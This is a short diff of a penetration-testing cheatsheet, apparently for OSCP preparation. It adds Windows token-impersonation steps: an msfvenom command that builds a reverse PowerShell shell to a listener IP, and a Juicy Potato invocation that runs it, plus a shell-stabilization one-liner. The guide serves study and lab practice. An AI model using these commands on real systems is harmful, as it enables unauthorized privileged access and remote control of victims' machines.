airadulescu/Pen-Test-Guidebook-Cheatsheet-OSCP-Preperation-/Full Guide (Enumeration to Priv Escalation).md

 5. Go to Exploit DB https://www.exploit-db.com/?type=local&platform=windows  and see if there are any.

 ### Token Impersonation
+1. Windows 7
+2. `whoami /priv` to see `SeImpersonatePrivilege` is allowed
+3. Transfer Juicy Potato.exe
+4. `msfvenom -p cmd/windows/reverse_powershell lhost=192.168.119.159 lport=9999 > myshell.bat ` create a revershell bat
+5. Transfer the bat
+6. `JuciyPotato.exe -t * -p myshell.bat -l 9999` (port has to be same as reverseshell)

 ## File Transfer to Linux
 0.`python3 -c 'import pty; pty.spawn("/bin/bash")'` `export TERM=xterm-256color` Stabalize shell \